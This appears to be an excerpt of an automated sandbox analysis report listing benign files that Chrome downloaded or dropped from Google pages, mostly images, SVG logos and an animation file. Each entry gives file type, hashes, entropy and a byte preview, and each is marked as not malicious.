                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):946
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.529486934378591
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:JY8iFVgVv882fuxBkvGt00NGNfkAclNGNGN45vd:JniFUE822jknh
                                                                                                                                                                                                                                                                                          MD5:BEAD483AEFEFECC7F57C8B07C9810B62
                                                                                                                                                                                                                                                                                          SHA1:6DA79643CFA4053E4359F1087684EF283CB0FD2E
                                                                                                                                                                                                                                                                                          SHA-256:4CAD8F94AF9C3253C5B4C92F1D36ECDB0D01DACC655250773A1428B0A80D0031
                                                                                                                                                                                                                                                                                          SHA-512:C97C6E8F5159523897E846B0D0D684FF0EBEA00AECF96A16DF5EE5EBB3BD78FE1146A763746F0A482D1DE827B3C46ABF5C742A5B474C0F256AF8630216B16067
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/aD5GNhlaU2d70gmSy5ioL1dMSUZN9cHDWPLkIBLhCsJ-BgcGUm-PD6o8XExZcx1i2iZV6PH0P8v3ceg0x7Tzd_OZ5FV0nXs5mX15sgA=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....iIDATx...=..Q....3k%..V..DB...M.%..hP........A.L)A'....D.]..3s.6..5.~...K.....3...y.....k.. u9....E?Wv....<bss.w.../....l..5`W.s.k...[^3.....E...n...O.N...4......3+.n...%&@..a....t....Y...R.9`{.....t.u...T.....3k2I.W.2.K.d)"......}.G!..u.MS.yV.........W....yT.x9p>U.^..Wu....W....1.Y..8N.....*.x9p............).x9p.Z_...}..^.\Fk.........e./^.\^.....I..A.c.....#..=P.j`.._.IL.....c..o..j..5..:.bR.....`q.,..9.8......X...s`q.,......~..d2V...........O2...0..........K.".{T...`q.,..9..z.....na......._.....G....Yx{.....0y...+}.E.F.0N]..~.5L-.2.....X...s`q.,..9.8......X...s`q.,..9.8.....F.#;..P.g..},}.%...{/..K.b$.-Z...s`q.,...E..w...G...3..g.D..,Sw.;,.2...!....M.y../...+.....X...s`q.,..9.8......X...s`q.,..9.8......X...s`q.,..9.8.....v......#._......{`.mMR.......7...=4..|.....a@....C.7..$..x.1_.C.lm..<bx...R.9..0...[..f....bffff........C....IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):90484
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.03960438512634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:bPpXaGSqZ921NHlOM5b3xnox7uVi4YiNo7ceHrCcXygiuG/MRP6:bPpXxf2X8M5bh6D9XygiuRV6
                                                                                                                                                                                                                                                                                          MD5:F20B1D2E274B779C63727F06505D232C
                                                                                                                                                                                                                                                                                          SHA1:EDC503A9A9AAD83A560FB779B01F1853154375D7
                                                                                                                                                                                                                                                                                          SHA-256:D5B2839C866FFE61B329CBC23C6C1B395D0C30106EA88BBE1F34F24B6F226BF2
                                                                                                                                                                                                                                                                                          SHA-512:9CDA295C7791EE04F144693A8FC2CCFBCA307CDC143A591B3ABCC2C7AF8C47A726CCF7858DE1A298B9E81D72591796A5D236D7DF2BE5BDF0756450F71F52982F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/fNUA4JyoE0kOcu75PdKVirKEeqgTl7WhvQm_pEG50glEQQrTJ5SD13gGMO3hgSeX_T4oCbZl-jB0249MXawUPhKdZHe-TLyM_9jp=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFFla..WEBPVP8L`a../W....u!...R....... ".r.2....swE.1.w....."In....T....X.d....%.s..>ZfffF...-..N....J3..g..81........._....m.6.._..W.....R..m..sy...m.l{M.fV......<...eoc....~........TR\...df.Gt.....'333.`.1.j....T..,..{.G@P..h.e[......@j] ......m...J...2....Lg.a>.\>..........c*lM.0....q,....e.m.j..m.R[k.$u.m.=x23<.0_....Xo.k.Fy.:.Zk....!I.._DfU.F;{l..>.m.m...>k..g.......%[.....I..Z5..@..................................................................................................................................................................................................................................................................................................................................................................................................................................................;.....................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 163
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):161
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.710866037643626
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Fttv4miJodP6y8p3NYUUpVctaKWU9h0hg8t+TZ3g/GleRDCDAD/:XtgmTAq1VmWLDtyAnRDCs/
                                                                                                                                                                                                                                                                                          MD5:6A01E470DD076F13EBC21B806FAF7C0F
                                                                                                                                                                                                                                                                                          SHA1:E7BA2B38175584D47479A6F9EA360D6DB1E34E13
                                                                                                                                                                                                                                                                                          SHA-256:C9B68DFD0ADB1D7CD2695133A2AE3A8FD0D47D9232E2DFE7A908E48416A8A614
                                                                                                                                                                                                                                                                                          SHA-512:D647928D10AACAA3C7B924466006FBBFAC5F2FBE412933E5D526EFDDD279583CCA22B5BFA0343DEA90941F992FF4A736EF1ED4726FC55D72C628559F95F3D94D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/maps/select_arrow.svg
                                                                                                                                                                                                                                                                                          Preview:..........4.A.. .........l.....{..H...T".....L.u.6Avc..%!X.&.4...9.oq.H@ .J.v.k.1..}.a.hSZ...YV,~&....0.U....Q.C.`.-;.......H1...>.m...[..........-.e.....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):13482
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.978621445906871
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:ZOUiGIhZnyzZBYIHj8QZCF10h/9wxGJTR67/QoqLyGza5h2JvnvlfV/jrkG4gMRj:It+DKv5kS7/QosyUAItnv5NSgIs6R
                                                                                                                                                                                                                                                                                          MD5:96A60B50E2C4ACEAA27E70FB2B79ABE5
                                                                                                                                                                                                                                                                                          SHA1:F8ED3D958ABAC1716C8B9315DDB7A0F21EF7E5C5
                                                                                                                                                                                                                                                                                          SHA-256:FF1F6CE7A89C380F7924074ABFCC5AA989989BB9D2E747F146D0B3F2EF6813F9
                                                                                                                                                                                                                                                                                          SHA-512:962E87C760F0F7446F62CFC37DF8DC7E9A08193F8B88A603038E57D4E9F00DB52D04279BDD410B90D7AA4E99A28078052E6F51E44A5BE21D5FBF49A3BF3F676D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/tC78k3bL_DjdIByD4HSnnblCZF0nlR599IWYDDghEJDn7dwg-tuOIXGVR1TwxePI063JTgu9NvrsvRutrqHOfR5AAWduD51R8zuswV8=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx..{.o.U..Yk...u...yJ3#..{F..H<...rL......I*.q..*.8..I...........SB$J..[@y.. ..P.8e.@.cIH..}.}w..w..+....9.s.....J..nu..w.{......^./.!w..........uw......R.....X..._.W..;}im.,..s|._...+.*.;.^urK.}.>qbK.].qc.?.......}.N_+.,..9.{o..~W..E...5C.'T..$.i]....}..'...K7;...I......C.......;y./...usU....W....x..c.xU5.J*.B..0...^.r........1.}....>...N..............A.....7.z.\.>.<(....P!..T1TA....O..X,."0.#+$._.f.w{!......S_.{..........*.-..z.x\.7.._=T.K`....Y...Q..@....K....].`..3.N..I.g.b?.........hn.+F..._^Y.r..>b..R...^E^.%..*["P...S.`..00.E.u.ZA.._..I.'..lo%....9.I....._...j.....~.~....m.d.....S9..x."...T..,.......N...P......Wc.j$.J|W..'..#.......$..p.0@..E.....9....?.}..9./)....{..a.&....S...J. .%...e..@...%....(f!.!.......W..<&......lf..V]..N.....I.....{w...?.../.|Y..O...|.Fy.V...O...Ey8'
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5160276412662315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Ul/ygn1ZrFIEbpD7an:UAi1ZYn
                                                                                                                                                                                                                                                                                          MD5:4597EBF072B6E123705160FD4571A540
                                                                                                                                                                                                                                                                                          SHA1:574D9C3C77230531194DDF955F79B4E0A539E458
                                                                                                                                                                                                                                                                                          SHA-256:48860D4FE9F78C8C9D195830988CD52AB17E71C7C0E623383509F5C966A6BF5F
                                                                                                                                                                                                                                                                                          SHA-512:6E975560962FA57B35F7F8EB0B5666F6D48C97BE69080B02E87DCA7FCC3823BDB5E769652A310DEFE4EAD730145E466B42891F3D0DC248D037ACD835772931DE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF$...WEBPVP8L..../..?.....v....E...".....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1560
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.088043317491995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:CLK/ksGxPgkUfgDL8uflIrLNMhG8Q8sYcl4:Ur1FUfgDAufr/Q8s7l4
                                                                                                                                                                                                                                                                                          MD5:0FAAFDF5BBDECD4D8899F0FCCE45DCE1
                                                                                                                                                                                                                                                                                          SHA1:10AA1A950CC3078427495C10A0F7F15A1B5DD227
                                                                                                                                                                                                                                                                                          SHA-256:1E1D28E3ABB9C8259BB70B96490441AE862AA40D352663BA2542EC1AD49F2D58
                                                                                                                                                                                                                                                                                          SHA-512:47E7B60E128FAD56CFD1FE1534E59B33B58C24374A8079E71848DD322937F7C769FE4F48455718B28FC8B8784CECBE5FDE3DC9F4F31C2D166AE1FFEB27E7C5B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark54_clr_84x28px.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 84 28" width="84" height="28">. <path d="M11.06 20.38c-5.42 0-9.98-4.42-9.98-9.84S5.64.7 11.06.7c3 0 5.14 1.18 6.75 2.71l-1.9 1.9c-1.15-1.08-2.71-1.92-4.85-1.92C7.1 3.39 4 6.58 4 10.54c0 3.96 3.1 7.15 7.06 7.15 2.57 0 4.03-1.03 4.97-1.97.77-.77 1.27-1.87 1.46-3.38h-6.43V9.66h9.05c.1.48.14 1.06.14 1.68 0 2.02-.55 4.51-2.33 6.29-1.73 1.79-3.93 2.75-6.86 2.75zm23.18-6.33c0 3.65-2.8 6.34-6.24 6.34s-6.25-2.69-6.25-6.34c0-3.67 2.8-6.34 6.25-6.34s6.24 2.67 6.24 6.34zm-2.73 0c0-2.28-1.63-3.84-3.51-3.84s-3.51 1.56-3.51 3.84c0 2.26 1.63 3.84 3.51 3.84s3.51-1.59 3.51-3.84zm16.73 0c0 3.65-2.8 6.34-6.25 6.34-3.44 0-6.24-2.69-6.24-6.34 0-3.67 2.8-6.34 6.24-6.34 3.45 0 6.25 2.67 6.25 6.34zm-2.73 0c0-2.28-1.63-3.84-3.51-3.84s-3.51 1.56-3.51 3.84c0 2.26 1.63 3.84 3.51 3.84 1.89 0 3.51-1.59 3.51-3.84zM61.9 8.09v11.38c0 4.68-2.76 6.6-6.02 6.6-3.07 0-4.92-2.06-5.62-3.74l2.42-1.01c.43 1.03 1.49 2.26 3.19 2.26 2.09 0 3.38-1.3 3.38-3.72v-.91h-.1c-.62.77
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 171 x 213, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6327
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.917392761938663
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:fqjwqVtaVHyEy9BWc2AwJ+3qg1f6WUBIT8mIKPNc93Y8Nm:Yk3WBkAkg1CWUCwmIKS93O
                                                                                                                                                                                                                                                                                          MD5:4C9ACF280B47CEF7DEF3FC91A34C7FFE
                                                                                                                                                                                                                                                                                          SHA1:C32BB847DAF52117AB93B723D7C57D8B1E75D36B
                                                                                                                                                                                                                                                                                          SHA-256:5F9FC5B3FBDDF0E72C5C56CDCFC81C6E10C617D70B1B93FBE1E4679A8797BFF7
                                                                                                                                                                                                                                                                                          SHA-512:369D5888E0D19B46CB998EA166D421F98703AEC7D82A02DC7AE10409AEC253A7CE099D208500B4E39779526219301C66C2FD59FE92170B324E70CF63CE2B429C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...................WPLTE...z..z........2........W..{..V........z.....2..3.....V..2..................W.....>`......tRNS.............................Y..j....IDATx....BcI.@A.s..HX....k.0c...T.?n./.~....b....GM.Gu.c...?.{5.5...4.'.o<...i.O.n<.f..?).g.&..8.E4..tl.4.G.o4.....'.....\......._ ...../.~..<......../.~^.}...?...~...Z../.~.]._ ...I. .Q.Y....YQu..i..4.._ |S...A.-.-h...9...o...k.....9o..?N.U,../+...Z.y...nbMu....4O.7>..Y.-L=J..q..`.B^{4~.p...bR.j.....Gq=..]&..7Y)G6.....A.h`i]...Pd.'.7....9.2...2x.........&..a0N..By.Y.C.*.S......nR.-..A[5.....|.p...+v...d\e..]Yq;.&q0..F.c.....p3.&.`..!q..}...k.g5n#........NG-.9...C..[.7.n.v..u......{o.C&n!.(.G7.JA.'6..{(<....p....:..!=..1.f.."..n.8....~o..N.3l..p.[....*......r..6..z...(.g1qA.[....q.v+..&...B{.I.\..-.....S.y&.......J.Wn!|D.....+...y.....9.......> .j......{.....K\X.n!..e.I.+'...j...-pA.[..2...8g.DO.#.?p.. ....-.w5.d......4....n..!q..=..Gu.X..O.........sN.h.q..n!..qP
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):659391
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.509533593186057
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:WUvI7MKQuoU7vJr/8nnr9i9rb7yEvRcRc6vR/RcPvRYRcYlGnLr9xc1C0R/IjR/W:9v0pQs7+
                                                                                                                                                                                                                                                                                          MD5:A9E4EEFEA555DE09A379F995F6FE0CFB
                                                                                                                                                                                                                                                                                          SHA1:910BEE7AE78A982A719DE3E9AC10D00F69A863C6
                                                                                                                                                                                                                                                                                          SHA-256:87431668C9EA056BB9F6A7A83CBA66C867B273FD8AFAE1BBEAF16D8952978749
                                                                                                                                                                                                                                                                                          SHA-512:5C0E176BC8C14D4E5A72327C40C4B96D2AF5B5CF8D102E9A0EFA10F1BA302A691ABDF77DBFD649D18D6932F8E5BA216F96E8C322154B13C7944D478BC7228296
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"v":"4.8.0","meta":{"g":"LottieFiles AE 3.4.5","a":"","k":"","d":"","tc":""},"fr":25,"ip":0,"op":123,"w":860,"h":650,"nm":"Desktop - Gmail Product update - Emoji animation v03.2","ddd":0,"assets":[{"id":"image_0","w":326,"h":83,"u":"","p":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUYAAABTCAYAAADju65sAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAGKLSURBVHgB7b0JgGZFdS9+7vLtX+/dsy8wC8iwgyIBgQEHNSbkGaIY44YmbsS8mBijiTFCln8SfUbznkHF5D3zjyvEFRM3DCAKyj4DM8Aw+9Ld0/v27Xd5v1/dW1/f7/bXPdMz3WPy0gd6vnvrVp06dc6pU6dO1a0rsgRLsARLsARLsARLsARLMBcY8nMG3/cNgE9acK1+mc403uJX5dH5w3tVNLhV+aJl9HW9ikg94usKAxwSrVsji5BnxOrUeP3I8zr+GA2+pkHXHV430BXBX8cVZvYj7Z7RVp3eBO9cMvWP9zxKS7Tds9ApEbYZTepoWl+TdsTr1vcNfIjKT+eJ6U9dVvE6ZkuPPg8RNtMxfS3NyjZpU4Mea9ri9UhMrnH9jelKXD3julFnSLzuKD1ROmL8kkbVb2xHrE31emLti9YXJdiI8beeb67+Lz9HMOU0Qcg4I5ZmRH8jCq/B0IyLG4DbbrvNxJ8SCH/5/NZbbzVj9ak0/kUEb+DeiNOgaSPekBQjjiuqENFyuq+GRRrw6HzROnW5SP6o8qo2RdsS4pJoPWxz2BYzrMNgviivZrJT6uXjeWK0RI2g5kVDm1lX7F7jrpdvIk+JtyNKm5aTRuEHU
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1307909
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.981946408361568
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:Hb2Xcp5BEqx6IdkPWSUi8aGqJ7cFNbtuOrxmdSxOS4PSkn97:HiMvEq0IyyqWFNbtu+Ed+N4akn97
                                                                                                                                                                                                                                                                                          MD5:A5841CD8D9CC63A2140E9894F4FEE397
                                                                                                                                                                                                                                                                                          SHA1:9CFF4B60473FDCD18C4225A70437F99EE3993181
                                                                                                                                                                                                                                                                                          SHA-256:2260B51F93E16F587E518EF2950DFB92EB2279C331101DB2995853540A6BC3DD
                                                                                                                                                                                                                                                                                          SHA-512:CFE5EAFE71D391E58899BB3DBE9484BDBD81FB962965176E84E747C3A8BA4FCB855C72D3F87A5EDBF1075704B55C80A05E81D04E08B929FC3DA32C7B45652C2E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....sRGB.........eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 17:17:04......................................................2022:09:08 17:17:04.q.%....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exif:ColorSpace>65535</exif:ColorSpace>. <
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2860
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.879156635175711
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:fjQksA6iEpeC9On0wvRNbqvGI4NY6+ifbUr9VIiDj47Bj82rLtvGDzt3gZ9ptxll:fjQO6VPCFqeI4NY6+Jn47Bje2RPN
                                                                                                                                                                                                                                                                                          MD5:FB458CB44A816F8CB363B60DB753F71E
                                                                                                                                                                                                                                                                                          SHA1:F3AABDB35D06026CF13E72D2118B3FA81FC06FE2
                                                                                                                                                                                                                                                                                          SHA-256:FCEC976891ABCE6C4E0C4636FE4FC4F19137C73B4434C24D1AA7FF3CF3B20468
                                                                                                                                                                                                                                                                                          SHA-512:6851B77E81DC158E201E3DAD2DAB781ECAA17AB179DA47F31E7CC3733CFA730CDC4D04A4898CB6C95BF5C5B72A4DBE1691493565CD4C3E7841ECDEB296EC7B38
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..yl.....7{..C..$\../..CB..R.$..PZT...CCiAEEH@..*..@."..ZP)..%.I...*m.....D.AU...^...{..a;..Y.....|$_.~...|.y.fv...........u.a.v.0....J.f.............8F..~.+..)l.`o..Rf...@.C.]Z4..t.../.+.X..........-bg>....y...h...A.'S._'._.6.`0R..s...."Y..U).h....@.E.#.3.@..5... .@.Q'......?.;.bzD.T.1.`..6......!......:.YF....y..3....=r..S....+.]...4.]......\.Xb...:.j.}.\.>.TN...V.!...K,"..L...U.L..R.|..8..O..+([..(x..j-qr....oR...8..-...-..i..=.R....J.O..\...8.<2..l0..H....n..mj ?.&..c....>...J..V...i........3.u.(.X.`.....%.o0..5.j.j.6.....N.;.|.....<!....;Y:..5....h.{.....Zr. .)..G.....Y3....V..b~R$..i......u....u.)....u.d.]x..V.....x2....4...+.|.5.....M.{?.t].......l.e6...KY.B.........<.h..N.AXM.&!:.....^.-/..i......|O;<...J_.7...3B5........`k.oY..ijzB/\|.e..j.I.L..._.0OzC..o..~v%.].2+.<....X..u..q..............\<.v...Z......\..R=..H...[-9J.<#R..5..{..iV....P......f.....C.$H.fBfw..}...qI.YM....^^.Y
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):101
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.199474701689137
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:VlN4hT/MqulS4JUkDZHG6JElJWdHZ+4LQpNYe:V4Ke4TLJkWdHAHpue
                                                                                                                                                                                                                                                                                          MD5:DF8EC3BB3311A9E8BE728B5F22093251
                                                                                                                                                                                                                                                                                          SHA1:652C24DA321D78B410776D4B386C5DD18F49D0C8
                                                                                                                                                                                                                                                                                          SHA-256:DF7B8C94B419D1502859855607F4A1A9FB0FB22BD4FC551CD998ADB120C535D8
                                                                                                                                                                                                                                                                                          SHA-512:FDE20B6B5CB418E2E7E73AA0519B09186CF2D4A92DA0C70488D968224327B15AF57EE243D3C033143E6A4E65F688AFA7E657BC3A766EDCC7E8A1DA059C2FA1A9
                                                                                                                                                                                                                                                                                          Malicious:false
